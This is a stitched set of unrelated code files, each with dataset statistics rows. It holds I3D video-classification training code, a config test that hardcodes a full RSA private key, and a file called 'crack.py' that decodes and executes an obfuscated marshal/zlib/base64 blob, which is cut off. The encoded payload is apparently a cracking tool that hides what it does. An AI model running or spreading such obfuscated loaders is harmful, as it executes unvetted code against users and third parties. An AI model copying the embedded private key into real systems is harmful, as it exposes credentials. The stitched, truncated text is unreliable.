optimizer = keras.optimizers.Adam(lr = diTrainTop["fLearn"])
keI3DOflow.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])
count_params(keI3DOflow)
keI3DOflow.fit_generator(
generator = genFramesTrain,
validation_data = genFramesVal,
epochs = diTrainTop["nEpochs"],
workers = 4,
use_multiprocessing = True,
max_queue_size = 8,
verbose = 1,
callbacks=[csv_logger, cpTopLast, cpTopBest])
# Fit entire I3D model
print("Finetune all I3D layers with generator: %s" % (diTrainAll))
csv_logger = tf.keras.callbacks.CSVLogger("log_flow_mirror/" + sLog + "-acc_entire.csv", append = True)
keI3DOflow = layers_unfreeze(keI3DOflow)
optimizer = keras.optimizers.Adam(lr = diTrainAll["fLearn"])
keI3DOflow.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])
count_params(keI3DOflow)
keI3DOflow.fit_generator(
generator = genFramesTrain,
validation_data = genFramesVal,
epochs = diTrainAll["nEpochs"],
workers = 4,
use_multiprocessing = True,
max_queue_size = 8,
verbose = 1,
callbacks=[csv_logger, cpAllLast, cpAllBest])
return
def train_I3D_rgb_end2end(diVideoSet, method='rgb'):
"""
* Loads pretrained I3D model,
* reads optical flow data generated from training videos,
* adjusts top-layers adequately for video data,
* trains only news top-layers,
* then fine-tunes entire neural network,
* saves logs and models to disc.
"""
# directories
sFolder = "%03d-%d"%(diVideoSet["nClasses"], diVideoSet["nFramesNorm"])
sClassFile = "data-set/%s/%03d/class.csv"%(diVideoSet["sName"], diVideoSet["nClasses"])
#sVideoDir = "data-set/%s/%03d"%(diVideoSet["sName"], diVideoSet["nClasses"])
if method == 'rgb':
sImageDir = "data-temp/%s/%s/image"%(diVideoSet["sName"], sFolder)
else:
sImageDir = f"data-temp/%s/%s/image_{method}"%(diVideoSet["sName"], sFolder)
#sImageFeatureDir = "data-temp/%s/%s/image-i3d"%(diVideoSet["sName"], sFolder)
#sOflowDir = "data-temp/%s/%s/oflow"%(diVideoSet["sName"], sFolder)
#sOflowFeatureDir = "data-temp/%s/%s/oflow-i3d"%(diVideoSet["sName"], sFolder)
sModelDir = "model_rgb_mirror"
diTrainTop = {
"fLearn" : 1e-3,
"nEpochs" : 3}
diTrainAll = {
"fLearn" : 1e-4,
"nEpochs" : 17}
nBatchSize = 1
print("\nStarting I3D end2end training ...")
print(os.getcwd())
# read the ChaLearn classes
#oClasses = VideoClasses(sClassFile)
# Load training data
genFramesTrain = FramesGenerator(sImageDir + "/train_videos", nBatchSize,
diVideoSet["nFramesNorm"], 224, 224, 3)
genFramesVal = FramesGenerator(sImageDir + "/val_videos", nBatchSize,
diVideoSet["nFramesNorm"], 224, 224, 3)
# Load pretrained i3d model and adjust top layer
print("Load pretrained I3D flow model ...")
keI3DOflow = Inception_Inflated3d(
include_top=False,
weights='rgb_imagenet_and_kinetics',
input_shape=(diVideoSet["nFramesNorm"], 224, 224, 3))
print("Add top layers with %d output classes ..." % 63)
keI3DOflow = layers_freeze(keI3DOflow)
keI3DOflow = add_i3d_top(keI3DOflow, 63, dropout_prob=0.5)
# Prep logging
sLog = time.strftime("%Y%m%d-%H%M", time.gmtime()) + \
"-%s%03d-%03d-rgb-i3d"%(diVideoSet["sName"], diVideoSet["nClasses"], diVideoSet["nFramesNorm"])
# Helper: Save results
csv_logger = tf.keras.callbacks.CSVLogger("log_rgb_mirror/" + sLog + "-acc_above.csv", append = True)
# Helper: Save the model
os.makedirs(sModelDir, exist_ok=True)
cpTopLast = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-above-last.h5", verbose = 0)
cpTopBest = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-above-best.h5",
verbose = 1, save_best_only = True)
cpAllLast = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-entire-last.h5", verbose = 0)
cpAllBest = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-entire-best.h5",
verbose = 1, save_best_only = True)
# Fit top layers
print("Fit I3D top layers with generator: %s" % (diTrainTop))
optimizer = keras.optimizers.Adam(lr = diTrainTop["fLearn"])
keI3DOflow.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])
count_params(keI3DOflow)
keI3DOflow.fit_generator(
generator = genFramesTrain,
validation_data = genFramesVal,
epochs = diTrainTop["nEpochs"],
workers = 4,
use_multiprocessing = True,
max_queue_size = 8,
verbose = 1,
callbacks=[csv_logger, cpTopLast, cpTopBest])
# Fit entire I3D model
print("Finetune all I3D layers with generator: %s" % (diTrainAll))
csv_logger = tf.keras.callbacks.CSVLogger("log_rgb_mirror/" + sLog + "-acc_entire.csv", append = True)
keI3DOflow = layers_unfreeze(keI3DOflow)
optimizer = keras.optimizers.Adam(lr = diTrainAll["fLearn"])
keI3DOflow.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])
count_params(keI3DOflow)
keI3DOflow.fit_generator(
generator = genFramesTrain,
validation_data = genFramesVal,
epochs = diTrainAll["nEpochs"],
workers = 4,
use_multiprocessing = True,
max_queue_size = 8,
verbose = 1,
callbacks=[csv_logger, cpAllLast, cpAllBest])
return
def train_I3D_combined_end2end(diVideoSet, method='rgb'):
"""
* Loads pretrained I3D model,
* reads optical flow data generated from training videos,
* adjusts top-layers adequately for video data,
* trains only news top-layers,
* then fine-tunes entire neural network,
* saves logs and models to disc.
"""
# directories
sFolder = "%03d-%d"%(diVideoSet["nClasses"], diVideoSet["nFramesNorm"])
sClassFile = "data-set/%s/%03d/class.csv"%(diVideoSet["sName"], diVideoSet["nClasses"])
#sVideoDir = "data-set/%s/%03d"%(diVideoSet["sName"], diVideoSet["nClasses"])
if method == 'rgb':
sImageDir = "data-temp/%s/%s/image"%(diVideoSet["sName"], sFolder)
else:
sImageDir = f"data-temp/%s/%s/image_{method}"%(diVideoSet["sName"], sFolder)
#sImageFeatureDir = "data-temp/%s/%s/image-i3d"%(diVideoSet["sName"], sFolder)
sOflowDir = "data-temp/%s/%s/oflow"%(diVideoSet["sName"], sFolder)
#sOflowFeatureDir = "data-temp/%s/%s/oflow-i3d"%(diVideoSet["sName"], sFolder)
sModelDir = "model_combined_mirror"
diTrainTop = {
"fLearn" : 1e-3,
"nEpochs" : 3}
diTrainAll = {
"fLearn" : 1e-4,
"nEpochs" : 17}
nBatchSize = 1
print("\nStarting I3D end2end training ...")
print(os.getcwd())
# read the ChaLearn classes
#oClasses = VideoClasses(sClassFile)
# Load training data
genFramesTrain_flow = FramesGenerator(sOflowDir + "/train_videos", nBatchSize,
diVideoSet["nFramesNorm"], 224, 224, 2, bShuffle=False)
genFramesVal_flow = FramesGenerator(sOflowDir + "/val_videos", nBatchSize,
diVideoSet["nFramesNorm"], 224, 224, 2, bShuffle=False)
genFramesTrain_rgb = FramesGenerator(sImageDir + "/train_videos", nBatchSize,
diVideoSet["nFramesNorm"], 224, 224, 3, bShuffle=False)
genFramesVal_rgb = FramesGenerator(sImageDir + "/val_videos", nBatchSize,
diVideoSet["nFramesNorm"], 224, 224, 3, bShuffle=False)
# Load pretrained i3d model and adjust top layer
print("Load pretrained I3D flow model ...")
keI3DOflow = Inception_Inflated3d(
include_top=False,
weights='flow_imagenet_and_kinetics',
#weights='model/20200704-1221-tsl100-oflow-i3d-entire-best.h5',
input_shape=(diVideoSet["nFramesNorm"], 224, 224, 2))
print("Add top layers with %d output classes ..." % 63)
keI3DOflow = layers_freeze(keI3DOflow)
keI3DOflow = add_i3d_top(keI3DOflow, 63, dropout_prob=0.5, late_fusion=True)
print("Load pretrained I3D rgb model ...")
keI3Drgb = Inception_Inflated3d(
include_top=False,
weights='rgb_imagenet_and_kinetics',
#weights='model/20200704-1221-tsl100-oflow-i3d-entire-best.h5',
input_shape=(diVideoSet["nFramesNorm"], 224, 224, 3),
layer_name='RGB')
print("Add top layers with %d output classes ..." % 63)
keI3Drgb = layers_freeze(keI3Drgb)
keI3Drgb = add_i3d_top(keI3Drgb, 63, dropout_prob=0.5, late_fusion=True, layer_name='RGB')
keI3Dfusion = model_fusion(keI3Drgb, keI3DOflow)
# Prep logging
sLog = time.strftime("%Y%m%d-%H%M", time.gmtime()) + \
"-%s%03dclass-%03dframe-combined-%s-i3d"%(diVideoSet["sName"], diVideoSet["nClasses"], diVideoSet["nFramesNorm"], method)
# Helper: Save results
csv_logger = tf.keras.callbacks.CSVLogger("log_combined_mirror/" + sLog + "-acc_above.csv", append = True)
# Helper: Save the model
os.makedirs(sModelDir, exist_ok=True)
cpTopLast = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-above-last.h5", verbose = 0)
cpTopBest = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-above-best.h5",
verbose = 1, save_best_only = True)
cpAllLast = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-entire-last.h5", verbose = 0)
cpAllBest = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-entire-best.h5",
verbose = 1, save_best_only = True)
# Fit top layers
print("Fit I3D top layers with generator: %s" % (diTrainTop))
optimizer = keras.optimizers.Adam(lr = diTrainTop["fLearn"])
keI3Dfusion.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])
count_params(keI3Dfusion)
train_gen = generate_generator_multiple(genFramesTrain_rgb, genFramesTrain_flow)
val_gen = generate_generator_multiple(genFramesVal_rgb, genFramesVal_flow)
keI3Dfusion.fit_generator(
generator = train_gen,
validation_data = val_gen,
epochs = diTrainTop["nEpochs"],
workers = 4,
use_multiprocessing = False,
max_queue_size = 8,
verbose = 1,
callbacks=[csv_logger, cpTopLast, cpTopBest])
# Fit entire I3D model
print("Finetune all I3D layers with generator: %s" % (diTrainAll))
csv_logger = tf.keras.callbacks.CSVLogger("log_combined_mirror/" + sLog + "-acc_entire.csv", append = True)
keI3Dfusion = layers_unfreeze(keI3Dfusion)
optimizer = keras.optimizers.Adam(lr = diTrainAll["fLearn"])
keI3Dfusion.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])
count_params(keI3Dfusion)
keI3Dfusion.fit_generator(
generator = train_gen,
validation_data = val_gen,
epochs = diTrainAll["nEpochs"],
workers = 4,
use_multiprocessing = False,
max_queue_size = 8,
verbose = 1,
callbacks=[csv_logger, cpAllLast, cpAllBest])
return
def mnodel_fine_tune(diVideoSet, method='rgb'):
# directories
sFolder = "%03d-%d"%(diVideoSet["nClasses"], diVideoSet["nFramesNorm"])
sClassFile = "data-set/%s/%03d/class.csv"%(diVideoSet["sName"], diVideoSet["nClasses"])
#sVideoDir = "data-set/%s/%03d"%(diVideoSet["sName"], diVideoSet["nClasses"])
if method == 'rgb':
sImageDir = "data-temp/%s/%s/image"%(diVideoSet["sName"], sFolder)
else:
sImageDir = f"data-temp/%s/%s/image_{method}"%(diVideoSet["sName"], sFolder)
#sImageFeatureDir = "data-temp/%s/%s/image-i3d"%(diVideoSet["sName"], sFolder)
sOflowDir = "data-temp/%s/%s/oflow"%(diVideoSet["sName"], sFolder)
#sOflowFeatureDir = "data-temp/%s/%s/oflow-i3d"%(diVideoSet["sName"], sFolder)
sModelDir = "model_combined_mirror"
diTrainTop = {
"fLearn" : 1e-3,
"nEpochs" : 3}
diTrainAll = {
"fLearn" : 1e-4,
"nEpochs" : 5}
nBatchSize = 1
print("\nStarting I3D end2end training ...")
print(os.getcwd())
# read the ChaLearn classes
#oClasses = VideoClasses(sClassFile)
# Load training data
genFramesTrain_flow = FramesGenerator(sOflowDir + "/train_videos", nBatchSize,
diVideoSet["nFramesNorm"], 224, 224, 2, bShuffle=False)
genFramesVal_flow = FramesGenerator(sOflowDir + "/val_videos", nBatchSize,
diVideoSet["nFramesNorm"], 224, 224, 2, bShuffle=False)
genFramesTrain_rgb = FramesGenerator(sImageDir + "/train_videos", nBatchSize,
diVideoSet["nFramesNorm"], 224, 224, 3, bShuffle=False)
genFramesVal_rgb = FramesGenerator(sImageDir + "/val_videos", nBatchSize,
diVideoSet["nFramesNorm"], 224, 224, 3, bShuffle=False)
# Prep logging
sLog = time.strftime("%Y%m%d-%H%M", time.gmtime()) + \
"-%s%03d-%03d-combined-i3d"%(diVideoSet["sName"], diVideoSet["nClasses"], diVideoSet["nFramesNorm"])
cpAllLast = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-entire-last.h5", verbose = 0)
cpAllBest = tf.keras.callbacks.ModelCheckpoint(filepath = sModelDir + "/" + sLog + "-entire-best.h5",
verbose = 1, save_best_only = True)
keI3Dfusion = load_model('model_combined_mirror/20200723-1559-tsl100-115-combined-i3d-entire-best.h5')
train_gen = generate_generator_multiple(genFramesTrain_rgb, genFramesTrain_flow)
val_gen = generate_generator_multiple(genFramesVal_rgb, genFramesVal_flow)
print("Finetune all I3D layers with generator: %s" % (diTrainAll))
csv_logger = tf.keras.callbacks.CSVLogger("log_combined_mirror/" + sLog + "-acc_entire.csv", append = True)
optimizer = keras.optimizers.Adam(lr = diTrainAll["fLearn"])
keI3Dfusion.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])
count_params(keI3Dfusion)
keI3Dfusion.fit_generator(
generator = train_gen,
validation_data = val_gen,
epochs = diTrainAll["nEpochs"],
workers = 4,
use_multiprocessing = False,
max_queue_size = 8,
verbose = 1,
callbacks=[csv_logger, cpAllLast, cpAllBest])
return
if __name__ == '__main__':
"""diVideoSet = {"sName" : "ledasila",
"nClasses" : 21, # number of classes
"nFramesNorm" : 40, # number of frames per video
"nMinDim" : 240, # smaller dimension of saved video-frames
"tuShape" : (288, 352), # height, width
"nFpsAvg" : 25,
"nFramesAvg" : 75,
"fDurationAvg" : 3.0} # seconds
"""
diVideoSet = {"sName" : "tsl",
"nClasses" : 100, # number of classes
"nFramesNorm" : 115, # number of frames per video
"nMinDim" : 240, # smaller dimension of saved video-frames
"tuShape" : (600, 480), # height, width
"nFpsAvg" : 10,
"nFramesAvg" : 50,
"fDurationAvg" : 5.0} # seconds
#dtype='float16'
#K.set_floatx(dtype)
#K.set_epsilon(1e-4)
#import os
#os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
#os.environ["CUDA_VISIBLE_DEVICES"] = ""
#train_I3D_rgb_end2end(diVideoSet)
#train_I3D_oflow_end2end(diVideoSet)
#train_I3D_combined_end2end(diVideoSet)
mnodel_fine_tune(diVideoSet, method='bgSub')
| 39.918129
| 129
| 0.654703
| 2,277
| 20,478
| 5.764163
| 0.120773
| 0.037714
| 0.0256
| 0.014476
| 0.892495
| 0.877867
| 0.870095
| 0.857676
| 0.8544
| 0.841829
| 0
| 0.030292
| 0.211691
| 20,478
| 512
| 130
| 39.996094
| 0.782754
| 0.170476
| 0
| 0.787582
| 0
| 0
| 0.191922
| 0.048117
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022876
| false
| 0
| 0.039216
| 0
| 0.084967
| 0.091503
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f8ab9a81b9b1b292ce0fa77debb4789ea11238f6
| 2,829
|
py
|
Python
|
tests/unit/test_config.py
|
yuwern/simple_restapi
|
26dd0503f7dc269f88ae55559dab40688c38ee75
|
[
"MIT"
] | null | null | null |
tests/unit/test_config.py
|
yuwern/simple_restapi
|
26dd0503f7dc269f88ae55559dab40688c38ee75
|
[
"MIT"
] | null | null | null |
tests/unit/test_config.py
|
yuwern/simple_restapi
|
26dd0503f7dc269f88ae55559dab40688c38ee75
|
[
"MIT"
] | 1
|
2020-06-24T08:27:44.000Z
|
2020-06-24T08:27:44.000Z
|
def test_default_config():
from app.config import Default
assert Default.DEBUG == False
assert Default.TESTING == False
assert Default.JWT_BLACKLIST_ENABLED == True
assert Default.JWT_BLACKLIST_TOKEN_CHECKS == ['access', 'refresh']
assert Default.SQLALCHEMY_TRACK_MODIFICATIONS == False
assert Default.MY_PUBLIC_KEY == '{"e":"AQAB","kty":"RSA","n":"v3qQPkwnUqp5Agz4LEk7FfJoqxETO50tTZ5_GgWGx9o4o_jJmR_ND9dpktasbPLRBGcWT_-IhQxsC0LhSJfnKIvbxtzjABZtkbffDqbDHMiWLv5s5hwYYpj7N4nXD6ezEZ_74LN8M3qpl6tN-OBC0zGlmBV6g6Zg8AtHlwyImcsxgepoUwjeF5F8nZn84QZuVgmpfvOLU7k4bhwJKr0CzQL0Q5xDkxDNVuOZRPPe2ELD9NC-YJUZh-JDwfngGapA08H4rzl5eo2yXMv0LbzX_TpTUpW-5ftZgMR3QGWGV9arV3lOvvhIsMa8DZQ_Ng2QP4g5L6nyiL4Y-Lb6Hy5Zrw"}'
assert Default.MY_PRIVATE_KEY == '{"d":"Fcl7WitOGiDdjfct0dQvTer8L-LMfm7-9aMAMVTJpjnVUgr_3VV5_sBy-ctFaUwjrk2Qg1-_B-yG6q0cdycZnUp0omcFyT_EDd2PGtqsvrywIf6_I1u1BpsDkqkzeEuLm4jJnyKtEip125UZVSUnVWKDxg9DlnE6_HU8GxrI_D6o3RqJ2_BVe82Bw7ljl9hxvz-JdDT6pkpqnCQuWAvYCmrXQsyL8dAaxjsK89ATMoWZvvHovtpYzuGcisohsgIruIbyngvTcWypHfnbiuKwEwmzgqFcpe2umGbVuA_61cXm2trSporXE9u-LsszA2V_7dMN3_wPFdvZB6M5gv0DSQ","dp":"39vUXLcW5BHFHmFeB7Z0XsPHt9MGMm4_tkmaW9ullnOZkLXKJcbiWZts-jBz_0Ut8U2pt_WyMFNSxdDub9n6lUMKNuvTazVrX2Ys9H0y23vRvnBAw1ypqQ_3QcnSd6szgdHgGxUSHx4qiIU_Wq0eFBu6MK1qvPV9ucE-nKUMs_0","dq":"IXtJ6DDV85H1FThXfo1odQEzbN34v0LiqoG7G0e-4TEGC9Zkj1vQGz8LN2mWTGV6AixlThXgkg3RIoxHzDo3LULbXtMJkwK0HQ1deR6JlJQM2gKpAtQTb05vI6Jj3y9MhtdrsdGmfburdt5kMT_olH7yxwxyfq4KslQ6mg25Ebk","e":"AQAB","kty":"RSA","n":"v3qQPkwnUqp5Agz4LEk7FfJoqxETO50tTZ5_GgWGx9o4o_jJmR_ND9dpktasbPLRBGcWT_-IhQxsC0LhSJfnKIvbxtzjABZtkbffDqbDHMiWLv5s5hwYYpj7N4nXD6ezEZ_74LN8M3qpl6tN-OBC0zGlmBV6g6Zg8AtHlwyImcsxgepoUwjeF5F8nZn84QZuVgmpfvOLU7k4bhwJKr0CzQL0Q5xDkxDNVuOZRPPe2ELD9NC-YJUZh-JDwfngGapA08H4rzl5eo2yXMv0LbzX_TpTUpW-5ftZgMR3QGWGV9arV3lOvvhIsMa8DZQ_Ng2QP4g5L6nyiL4Y-Lb6Hy5Zrw","p":"90uKsxfcbB99BwteK23-R3oEWROJ_u6IbgZEtA22DCx_b6FAeZZ8mymv0HzjvBFIdkAZ-_D1Q5caiwPpHaoASkd5RcRxo61IAYaOZNQGoYkvAGoLocffgXyzRpd60u5mOLCMoDwfrId3zvqj2qrdlEAHgpVETTmIS3VvDdDMVcM","q":"xjgKz4vGMgqnIe9dubgaU5Fgku0HMotCrhkyqxpGOxtRGR_gT-46KYOMhX_U2OmfsnI6bSI9sonPQn7f9a-xuyICWffGydiqkYpNkwhXZOlS4igfk-PW0nxhLNpLPaIyL4uBfE7RsDh0PdWcvJ1L0KDAixsABqwttGabRYXgcaU","qi":"JP1dpiSKoHRIDlxOKOk6lz8YwtMgUpUFr6OOMgiVoXfDHlBPFBMycEU6ivdlrw2sjHPnjlyPOrcQQU-2-9eXMPFTJJ2akbApkGSKMeJ98e5Ld5rlzQ0j5aQN2oqqupah3MJzP25ohQNKAbaJyUoSqVZ6DDAR4aQjvIdtTCrGDrI"}'
def test_production_config():
from app.config import Production
assert Production.SECRET_KEY
assert Production.JWT_SECRET_KEY
assert hasattr(Production, 'SQLALCHEMY_DATABASE_URI')
def test_Development_config():
from app.config import Development
assert Development.DEBUG
assert Development.SECRET_KEY == 'dev'
assert Development.JWT_SECRET_KEY == 'dev'
assert hasattr(Development, 'SQLALCHEMY_DATABASE_URI')
| 101.035714
| 1,654
| 0.889714
| 186
| 2,829
| 13.188172
| 0.543011
| 0.037097
| 0.015899
| 0.023237
| 0.308602
| 0.278027
| 0.278027
| 0.278027
| 0.278027
| 0.278027
| 0
| 0.102717
| 0.050194
| 2,829
| 27
| 1,655
| 104.777778
| 0.810197
| 0
| 0
| 0
| 0
| 0.1
| 0.725698
| 0.718982
| 0
| 0
| 0
| 0
| 0.7
| 1
| 0.15
| true
| 0
| 0.15
| 0
| 0.3
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3e285df1991bd478271c39753d8bdacc1c124d1c
| 8,806
|
py
|
Python
|
crack.py
|
Tumiiso/crack
|
caf100e240285e765603773d0232878f4c52ad57
|
[
"Apache-2.0"
] | 1
|
2021-09-02T22:49:18.000Z
|
2021-09-02T22:49:18.000Z
|
crack.py
|
Tumiiso/crack
|
caf100e240285e765603773d0232878f4c52ad57
|
[
"Apache-2.0"
] | null | null | null |
crack.py
|
Tumiiso/crack
|
caf100e240285e765603773d0232878f4c52ad57
|
[
"Apache-2.0"
] | null | null | null |
#Decompiled By D.B.Undergroud
#Dont try decompile bra
import marshal,zlib,base64
exec(marshal.loads(zlib.decompress(base64.b64decode("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